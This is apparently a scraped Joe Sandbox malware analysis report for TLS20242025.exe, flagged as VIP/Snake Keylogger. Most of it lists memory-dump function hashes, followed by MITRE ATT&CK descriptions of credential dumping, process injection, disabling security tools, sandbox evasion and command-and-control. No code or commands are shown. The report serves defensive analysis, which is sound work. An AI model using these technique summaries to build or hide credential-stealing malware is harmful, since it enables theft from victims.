Instruction ID: beb456fc1e395b852a1d9104dddb3460336926243063d5322b73d1c4f4cad1d9
Opcode Fuzzy Hash: f8605e641f161a98690760c435c6ac54fe036f951c7f471cdb12644d7c573f4d
Instruction Fuzzy Hash: C5C1B174E01218CFEB54DFA5C944B9DBBB2EF89304F2081A9D809AB355DB359E85CF50

Function 067DCCA0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9db5658a551a88848f6ec7bfbe5b81179125f40fdf191b622f0c17b3c0f07a72
Instruction ID: 546c3be037e55ba2d336ba65c2504a5a6dc7a0791e544b28a700a7ed1d879381
Opcode Fuzzy Hash: 9db5658a551a88848f6ec7bfbe5b81179125f40fdf191b622f0c17b3c0f07a72
Instruction Fuzzy Hash: B0C1B074E01218CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB355DB359E85CF50

Function 067DD550 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbd341fa9946a31ad9236a803268326e1940e4f5f2ad620a19e30c64392ce0f6
Instruction ID: e29550b26d09604b7383a61600b7ca72df1e5a18fd8e9ab3c0865944437dc784
Opcode Fuzzy Hash: dbd341fa9946a31ad9236a803268326e1940e4f5f2ad620a19e30c64392ce0f6
Instruction Fuzzy Hash: E0C1BF74E01218CFEB54DFA5C984B9DBBB2FF89300F2081A9D809AB355DB359A85CF50

Function 067DD9A8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e084ec9815308c38e6e25efa37ad6e7a649beff527a7d73bde69ae474a0e79a3
Instruction ID: 25d448d0fe03955fa660761cd0f660ce407ee76c99d2de2562e8dc69e63ff82d
Opcode Fuzzy Hash: e084ec9815308c38e6e25efa37ad6e7a649beff527a7d73bde69ae474a0e79a3
Instruction Fuzzy Hash: 5DC1B074E01218CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB355DB359E85CF50

Function 0105F974 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19fd6f6edfc1d1b2b2d511795cbca0733f2cdc85bfdd954477464d2dc61eef90
Instruction ID: cba3ba7a290e78c9aac29f91daf7fbb0809f9daa18a3ae8ff6c85bde643871b4
Opcode Fuzzy Hash: 19fd6f6edfc1d1b2b2d511795cbca0733f2cdc85bfdd954477464d2dc61eef90
Instruction Fuzzy Hash: ACC1AE74E01218CFEB54DFA5C984B9DBBB2AF89304F2081A9D819AB355DB359E85CF10

Function 067D5027 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26010fee1c926dbdac84a8b959137da15003f7acbac13a0f97f0ebcc7a4c7e29
Instruction ID: 882c86c6ae4023f8d8f424cefe78f7071a88ecda77c7638fdcdae2845cca2352
Opcode Fuzzy Hash: 26010fee1c926dbdac84a8b959137da15003f7acbac13a0f97f0ebcc7a4c7e29
Instruction Fuzzy Hash: 0DA11371D106598FDB14DFA9C844BEDFBB1EF89304F10C6AAE45867260EB709A85CF81

Function 067D0007 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3de98ba7c9e6c9ddb651002e7ce9829dc836252a5dbcb31afeb6dd04cd4ac84e
Instruction ID: 4dd0d08a3909d61b67c17b1d1aa42d174929ff57785d265afc1600aaf60fe1ac
Opcode Fuzzy Hash: 3de98ba7c9e6c9ddb651002e7ce9829dc836252a5dbcb31afeb6dd04cd4ac84e
Instruction Fuzzy Hash: F3711470E00259CFDB69DFA5C840BADBBB2FF89300F10C0A9D909A7666DB315982DF50

Function 067D003F Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3da1fa1acf0465fecf5239412870b7dc8858ffac268f4de6ab9c4b0f5021ead
Instruction ID: a198b212386ceae0172d7b91dab347efce3b33489d0759daabe58174f05505d4
Opcode Fuzzy Hash: f3da1fa1acf0465fecf5239412870b7dc8858ffac268f4de6ab9c4b0f5021ead
Instruction Fuzzy Hash: FA61B674E00219CBDB68DF66D944BADBBB2FF88304F10C1A9D909A7655DB315981DF40

Function 067DF3A8 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b82235f9b6abd8062713df891c019e6bd8847e03a3a7e5de724c36c2aa1bd87
Instruction ID: 1c447b96af6097067fb4455a82ff08a919bfb9497f9d44661d194ecb333c2a93
Opcode Fuzzy Hash: 0b82235f9b6abd8062713df891c019e6bd8847e03a3a7e5de724c36c2aa1bd87
Instruction Fuzzy Hash: C1412971D01248CBEB58DFBAD9446DEBBF2AF89300F24C52AC519BB265DB394946CF40

Function 067DEAF8 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76e07f2020ef1b13d9aab1fec6d0f15e72b5118c83de4eddb94f5c157ba81e61
Instruction ID: ff1d53b7bb513e9d64a44696884886eefd75226c65605651a931e2d8f23f057b
Opcode Fuzzy Hash: 76e07f2020ef1b13d9aab1fec6d0f15e72b5118c83de4eddb94f5c157ba81e61
Instruction Fuzzy Hash: 5D412770E01248CBEB59DFAAD9486EDBBF2AF89300F20C529C519BB265DB345946CF50

Function 067DF803 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c602af9659aa08dae09f7527435ea8b28ae9e1824edb83e2420e318e9e57749
Instruction ID: 202c2cae337ac790585296fc7d8d518c22cb248182f8970c28b1cd0e9caf7bc2
Opcode Fuzzy Hash: 9c602af9659aa08dae09f7527435ea8b28ae9e1824edb83e2420e318e9e57749
Instruction Fuzzy Hash: BF412770E012488BDB58DFAAD9446EDFBF2AF89300F20C539C419BB264DB394946CF50

Function 067DCC8F Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35fed3790b4714a030cba422c960d849bcf06832bbd9c1adb8e009a5e64c1d10
Instruction ID: 4d7c5b167dd82cda0f5a2906917d9707d34c5f575505fac8cd19db41747c5c81
Opcode Fuzzy Hash: 35fed3790b4714a030cba422c960d849bcf06832bbd9c1adb8e009a5e64c1d10
Instruction Fuzzy Hash: B0411570E01248CBEB59DFBAD9446EDBBB2AF89300F24C52AC518AB255DB354946CF50

Function 067DDDF1 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 352046886990be60d0f02496b8566f71d630bb5383d5aef25d307ba4fe08c8b9
Instruction ID: f243e2c586346fe22f4d669b3e03f493e687da784c492f9d4662aa5b6c77fb7f
Opcode Fuzzy Hash: 352046886990be60d0f02496b8566f71d630bb5383d5aef25d307ba4fe08c8b9
Instruction Fuzzy Hash: 51411570E01248CBEB58DFAAD9446EEFBB2AF89300F24C52AC514BB255DB345946CF50

Function 067DD540 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7119d3b3e0cc73824fa5d64338e9ac97985b93e8787187de22e438575cf50d5a
Instruction ID: 20d1c984bb787110ac477cc3fa37c05b2a5bb570c885772567733d9c5481dfb5
Opcode Fuzzy Hash: 7119d3b3e0cc73824fa5d64338e9ac97985b93e8787187de22e438575cf50d5a
Instruction Fuzzy Hash: 13411570D012488BEB58DFAAD9446EDBBF2EF89300F20C539C519AB255EB355946CF40

Function 067DE6A0 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c332f2645e4bb71488cfb60011b6b41add084bd8fa2e413060f7f8270e56ee5
Instruction ID: 045d31c3e1a98862faa0c906707367eec2bd1a38ff700d42de1ce9070f8f46e8
Opcode Fuzzy Hash: 2c332f2645e4bb71488cfb60011b6b41add084bd8fa2e413060f7f8270e56ee5
Instruction Fuzzy Hash: 02412570E002488BEB59CFAAC9446EDBBB2AFC9300F24C52AC515AB259EB344946CF50

Function 067DE6AF Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a726e67c9595a73a8fa370484846c0c73411e18a5f796e793f309c1582db4917
Instruction ID: ec93c34c4fd98b6e85917915bf851def803c6d83c52885cfe5a04e9318db1993
Opcode Fuzzy Hash: a726e67c9595a73a8fa370484846c0c73411e18a5f796e793f309c1582db4917
Instruction Fuzzy Hash: 2C41E270E012488BEB58DFAAD9446EDBBB2BF89300F24C12AC419BB255EB344946CF50

Function 067DDDFF Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 497c627243ca6d5e383408dd731b502ba9570157ea59d435d768c20ef0013832
Instruction ID: a2bead85a9297e3ebc2aaa23a93d0ca414f35d5e366e6dcb2733a9ad79da92e6
Opcode Fuzzy Hash: 497c627243ca6d5e383408dd731b502ba9570157ea59d435d768c20ef0013832
Instruction Fuzzy Hash: D041E370E01248CBEB58DFAAD9446EDFBF2AF89300F24C12AC419BB258DB345946CF50

Function 067DD9A7 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a796e673a3adbfcf6c6d338a111b15b52ce8de6acd6a66593e63a599320a77d
Instruction ID: d8186fd74059f399818ef9230ca1f4fee54310d29aa84f92899da7e786977638
Opcode Fuzzy Hash: 2a796e673a3adbfcf6c6d338a111b15b52ce8de6acd6a66593e63a599320a77d
Instruction Fuzzy Hash: 1741F470E01248CBEB58DFAAD9446EDFBF2AF89300F24C52AC419BB258DB354946CF50

Function 067DD999 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd44b3e6101871f256626a7d685b33154f67c1a7de23b18643fe3522807118c2
Instruction ID: b1c81625b23754b2205ef596c8270eec94044fdfd396a4eb9dc7b92c1d1ece42
Opcode Fuzzy Hash: cd44b3e6101871f256626a7d685b33154f67c1a7de23b18643fe3522807118c2
Instruction Fuzzy Hash: DB31F470E00248CBDB68DFAAD5446ADFBF2AF89300F24C52AC419AB259DB355946CF40

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report TLS20242025.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
TLS20242025.exe

Function 0275E398 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Function 026AD01C Relevance: .1, Instructions: 72
COMMON

Function 026AD2BC Relevance: .1, Instructions: 72
COMMON

Function 067D9548 Relevance: 1.9, APIs: 1, Instructions: 357
COMMON

Function 067D1E70 Relevance: 1.4, Strings: 1, Instructions: 113
COMMON

Function 067D0B30 Relevance: .7, Instructions: 709
COMMON

Function 01056FC8 Relevance: .5, Instructions: 451
COMMON

Function 01053E09 Relevance: .4, Instructions: 422
COMMON

Function 067DE258 Relevance: .3, Instructions: 268
COMMON

Function 067D2968 Relevance: .3, Instructions: 268
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre